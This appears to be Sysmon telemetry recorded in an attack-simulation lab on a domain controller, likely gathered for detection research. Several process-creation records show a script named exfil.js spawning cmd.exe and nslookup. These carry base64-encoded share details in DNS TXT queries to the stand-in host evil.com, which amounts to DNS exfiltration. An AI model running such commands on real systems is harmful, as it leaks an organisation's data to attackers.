14:16:38.236{2E1864BB-17C6-629A-3241-000000005F02}37326388C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-3341-000000005F02}8016C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.232{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.232{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.231{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.231{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.216{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3341-000000005F02}8016C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.216{2E1864BB-17C6-629A-3141-000000005F02}14881800C:\Windows\system32\cmd.exe{2E1864BB-17C6-629A-3341-000000005F02}8016C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.231{2E1864BB-17C6-629A-3341-000000005F02}8016C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C6-629A-3141-000000005F02}1488C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltqb.tmp 2>&1 10341000x8000000000000000202219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.200{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-3241-000000005F02}3732C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.200{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-3241-000000005F02}3732C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.200{2E1864BB-17C6-629A-3241-000000005F02}37326388C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-3141-000000005F02}1488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.184{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3241-000000005F02}3732C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.184{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.184{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.184{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.184{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.184{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3141-000000005F02}1488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.184{2E1864BB-17A1-629A-783D-000000005F02}55527992C:\Windows\System32\WScript.exe{2E1864BB-17C6-629A-3141-000000005F02}1488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.189{2E1864BB-17C6-629A-3141-000000005F02}1488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltqb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.169{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlimnq.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.153{2E1864BB-17C6-629A-2F41-000000005F02}26205608C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-3041-000000005F02}7264C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.153{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.153{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.153{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.153{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.153{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3041-000000005F02}7264C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.153{2E1864BB-17C6-629A-2E41-000000005F02}71927296C:\Windows\system32\cmd.exe{2E1864BB-17C6-629A-3041-000000005F02}7264C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.163{2E1864BB-17C6-629A-3041-000000005F02}7264C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C6-629A-2E41-000000005F02}7192C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlimnq.tmp 2>&1 10341000x8000000000000000202199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.137{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-2F41-000000005F02}2620C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.137{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-2F41-000000005F02}2620C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.137{2E1864BB-17C6-629A-2F41-000000005F02}26205608C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-2E41-000000005F02}7192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.113{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-2F41-000000005F02}2620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.113{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-2E41-000000005F02}7192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 